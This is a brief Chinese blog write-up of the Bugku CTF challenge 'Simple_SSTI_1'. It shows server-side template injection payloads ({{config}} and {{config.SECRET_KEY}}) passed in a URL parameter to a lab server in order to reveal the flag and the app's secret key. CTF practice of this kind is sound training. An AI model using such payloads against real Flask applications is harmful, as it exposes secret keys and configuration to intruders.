[bugku]Simple_SSTI_1

扒皮狼

 关注

阅读 70

2022-03-12

题目:
在这里插入图片描述

进入页面先按F12

在这里插入图片描述
有个提示secret_key
考虑模板注入

输入url:

http://114.67.175.224:10472/?flag={{config}}

在这里插入图片描述
直接找到了flag

如果访问

http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}

可以直接显示flag
在这里插入图片描述

相关推荐

BUGKU 变量1

一点读书 99 0 0

ssti1--Flask框架

王老师说 75 0 0

[bugku]-login1-sql约束攻击

大柚子top 81 0 0

BUGKU_CTF WEB(1-10)writeUP

成义随笔 86 0 0

【bugku】-newphp

天悦哥 107 0 0

Bugku 逆向

颜路在路上 45 0 0

SSTI漏洞基础解析

慕容冲_a4b8 62 0 0

【Real】[Flask]SSTI

小磊z 35 0 0

BugKu-Web

IT程序员 108 0 0

BUGKU------flag被盗

幸甚至哉歌以咏志 62 0 0

精彩评论(0)

0 0 举报